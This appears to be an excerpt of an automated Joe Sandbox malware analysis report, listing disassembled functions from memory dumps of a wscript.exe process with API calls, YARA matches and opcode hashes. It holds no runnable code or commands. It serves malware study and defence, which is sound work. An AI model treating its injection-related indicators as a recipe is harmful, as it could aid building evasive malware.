                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c514854601dd467857bda506241dffe4c2b286efe094f1022bed2cb9bbaa790a
                                                                                                                                                                              • Instruction ID: 931b7af2ce45bc6189cf371cd4baa5e188187d4f055177f3e66c98ad5a7321de
                                                                                                                                                                              • Opcode Fuzzy Hash: c514854601dd467857bda506241dffe4c2b286efe094f1022bed2cb9bbaa790a
                                                                                                                                                                              • Instruction Fuzzy Hash: B590022524555102F150B15C8418A164049ABE0205F55C031E0815598D8595D9556221
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 7f05d6ab0401767aa8fa602385436996a933af58a168a3b7f34bd732aa3dbb3d
                                                                                                                                                                              • Instruction ID: 90692436cbf4e073341be4163a5204c3f017dde4adb20ec3e08dcf2f4d23de2c
                                                                                                                                                                              • Opcode Fuzzy Hash: 7f05d6ab0401767aa8fa602385436996a933af58a168a3b7f34bd732aa3dbb3d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B900229211500032105F5584718907008A8BD5355355C031F1016554CD661D9615121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 4c529a5e2e86262cf84c0fd8998ebae3b093c3bebc8920c5c2b94af59c31ef8a
                                                                                                                                                                              • Instruction ID: 4e8d22501b34fe6a65fad884fcdd2b21ba5df6de74aa905486689e3e5e5e9780
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c529a5e2e86262cf84c0fd8998ebae3b093c3bebc8920c5c2b94af59c31ef8a
                                                                                                                                                                              • Instruction Fuzzy Hash: 99900229221500022145F558461890B04899BD6355395C025F1417594CC661D9655321
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e39f9a433b8cc4914c811c473e117a3b17f83d5ed542a0fd3658b36534097b02
                                                                                                                                                                              • Instruction ID: 2ccd2ce00c3e5328af2e240432bb4a07242025543762fe94ebe4e5180f4d1e4e
                                                                                                                                                                              • Opcode Fuzzy Hash: e39f9a433b8cc4914c811c473e117a3b17f83d5ed542a0fd3658b36534097b02
                                                                                                                                                                              • Instruction Fuzzy Hash: 5690023560550802F150B1588428B4600498BD0305F55C021E0025658D8795DB5576A1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 40e3ab250a0fcfb2fc31dcb1073c264c282525c3cef9a175fb7488404a8a9d62
                                                                                                                                                                              • Instruction ID: d3bf320435f6da78691e4d25c51e24ee620416683239d03375380f07b3e0ae54
                                                                                                                                                                              • Opcode Fuzzy Hash: 40e3ab250a0fcfb2fc31dcb1073c264c282525c3cef9a175fb7488404a8a9d62
                                                                                                                                                                              • Instruction Fuzzy Hash: EC90023520150802F180B1588418A4A00498BD1305F95C025E0026658DCA55DB5977A1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: ed8c2542d7b49bfdd2c11a916034474d65cf447ec3303095c7782b99e9064cfc
                                                                                                                                                                              • Instruction ID: 91ca33d3080d02a3f54f01141eee43f1cdb14f481e58fd16af111a7bb6b412d1
                                                                                                                                                                              • Opcode Fuzzy Hash: ed8c2542d7b49bfdd2c11a916034474d65cf447ec3303095c7782b99e9064cfc
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C90023520554842F140B1588418E4600598BD0309F55C021E0065698D9665DE55B661
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f2f9d39ac55d6a29fd085f386003f72e71a54c614d516ea9f9bca37550431927
                                                                                                                                                                              • Instruction ID: 36580a06d1b5a413938733b772f9cb698234893e530ddcd4b856a4251f2ed1de
                                                                                                                                                                              • Opcode Fuzzy Hash: f2f9d39ac55d6a29fd085f386003f72e71a54c614d516ea9f9bca37550431927
                                                                                                                                                                              • Instruction Fuzzy Hash: F4900265202500036105B1588428A16404E8BE0205B55C031E1015594DC565D9916125
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                                              • String ID: @J7<
                                                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                                                              • Opcode ID: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                                                                                              • Instruction ID: c736d6f1758b9b2b0ec61c69eaf3e1630beb5b023eb86798ef02d471b6c6f608
                                                                                                                                                                              • Opcode Fuzzy Hash: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                                                                                              • Instruction Fuzzy Hash: 403162B5A0060A9FDB11DFD8D8809EFB3B9FF88304B108569E515EB204D775EE45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                                              • String ID: @J7<
                                                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                                                              • Opcode ID: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                                                                                              • Instruction ID: 01828fa5fc2a3fb607376814e7112254e84dbcb1970a77e536a4996a68b7b173
                                                                                                                                                                              • Opcode Fuzzy Hash: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                                                                                              • Instruction Fuzzy Hash: E23150B5A0020A9FDB11DFD8D8809EFB3B9FF88304B108569E515EB204D775EE45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00379A8C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID: A46
                                                                                                                                                                              • API String ID: 3298025750-4203305099
                                                                                                                                                                              • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction ID: 4b21d69e1adffffca8fecff74b60d35e3b8bae9f26226d9ce1ca02c7fdef12b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction Fuzzy Hash: C4E06D762002087BC610EE59DC45FDB73ACEFC9710F004018FA08AB242DA30B91187B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00373D4B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                              • String ID: wininet.dll
                                                                                                                                                                              • API String ID: 3472027048-3354682871
                                                                                                                                                                              • Opcode ID: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                                                                                              • Instruction ID: b6f4a20cb894abfd9789f024b199e56062ceed3cc1851ed92ec022f665dead70
                                                                                                                                                                              • Opcode Fuzzy Hash: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                                                                                              • Instruction Fuzzy Hash: 75318BB1600605BBD724DFA4CC81FEBBBB9BB88700F10811CF95D6B241C3746A50CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00364762
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction ID: 22c1dbb96d74bda94d9b1887c69462412f5306393a049284fcbe12928874f97a
                                                                                                                                                                              • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction Fuzzy Hash: 36011EB9D0020DABDB11EAA4DC42F9DB7789B54708F108195E91C9B241F675EB148B91
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,003684BE,00000010,?,?,?,00000044,?,00000010,003684BE,?,?,?), ref: 00379B40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                                              • Opcode ID: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                                                                                              • Instruction ID: 40f5b98218759c67aa37a68a93c4b0dc96490e517c93aba225f8084ecdbf525d
                                                                                                                                                                              • Opcode Fuzzy Hash: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                                                                                              • Instruction Fuzzy Hash: 1501CCB2204508BBDB54DE99DC81EEB77AEAF8D710F008208BA0DA7241D634F8518BA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00359F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                              • Opcode ID: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                                                                                              • Instruction ID: 99197ced71b96e0aa057f20fcf13f198b6a47a12302c165e49700974cbba43c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                                                                                              • Instruction Fuzzy Hash: 38F0653334021436E33165A99C42FD7B64CDB80761F19442AFB0CEE1C1D996B80142E4
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00359F05
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                              • Opcode ID: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                                                                                              • Instruction ID: 3b6e4eb7a4e509237552d8315052e8dc089be16cf96fb4df617cd76cb765f324
                                                                                                                                                                              • Opcode Fuzzy Hash: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF0923324030436E23165A98C43FA7769C9B80B91F29401AFB0DEF1C1E9A6B80282E4
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00361BB9,?,?,00361BB9,^X7,?,?,00361BB9,^X7,00001000,?,?,00000000), ref: 00379A3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction ID: b347112d34cfc93de1323fb4e1e356f566be546dce8e65fbf591c188bf31e69c
                                                                                                                                                                              • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E09276200204BBD650EE59DC41FEF37ACEFC5750F004018F909A7241CA30B8118BB4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0036852C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                                                                                              • Instruction ID: 140eeb44a64c4e814413cf86bda897860a41b85c5f76698896bb116db6db6101
                                                                                                                                                                              • Opcode Fuzzy Hash: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 97E0263220020427FB206BB8EC46F623388AB4C764F498760BA1EDBAC5F939FC024150
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0036852C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                                                                                              • Instruction ID: fa2e8ac71f5380fa4b80726bace897f9d63af8cda9e6b2fcaa5b92796a565856
                                                                                                                                                                              • Opcode Fuzzy Hash: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                                                                                              • Instruction Fuzzy Hash: FAE0263210020437E7206B68DC46F653388AB4C760F498710BA1A9B6C5EA38FC024150
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00361EC0,0037819F,^X7,00361E83), ref: 00368323
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                              • Opcode ID: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                                                                                              • Instruction ID: bc6a99186809d441915af43bbae6b27673b638c5f39e14fe768a90da39a01626
                                                                                                                                                                              • Opcode Fuzzy Hash: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                                                                                              • Instruction Fuzzy Hash: 43D05E763803047BF611A6E48C57F16328D9B48790F4581A8BA0CEA6C2E856F5004669
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 00360F97
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                              • Instruction ID: a219b0986278317aa8b81b5f600e8aeba9ea4d81031daf4ac75f88ad2f908812
                                                                                                                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                              • Instruction Fuzzy Hash: FED02277B0000C7AAA1245C4ACC2CFFB76CEB84BA6F008063FF08E6040E6618D060BB0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 52dec4e3dbe1003c7a28a31e5d09be7af1a5f981fc554211251df400b2abce17
                                                                                                                                                                              • Instruction ID: 472432c3c378f94f4cccef7fd225ed9dedb82712373a710076f6c66c54895d80
                                                                                                                                                                              • Opcode Fuzzy Hash: 52dec4e3dbe1003c7a28a31e5d09be7af1a5f981fc554211251df400b2abce17
                                                                                                                                                                              • Instruction Fuzzy Hash: EDB09B759015C5C5FB11F760460CB1779446BD1705F15C0B1D2030645F4778E1D1E175
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500172226.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_4710000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                                                                                              • Instruction ID: 7e62812a09b567facec3da0921a2fcc8066b9c935f7aa120577e69aab0303bcd
                                                                                                                                                                              • Opcode Fuzzy Hash: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0641F971618B4D4FD368AF6C9085676B3E2FB89304F50092DD98BC3762EA70F8868785
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500172226.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_4710000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                              • API String ID: 0-3754132690
                                                                                                                                                                              • Opcode ID: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                                                                                              • Instruction ID: 3ceafe3d2a02277f991efedfe0ec4328ca24f4618ba06ebb2f1e414d181f8dd7
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B9152F04482948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
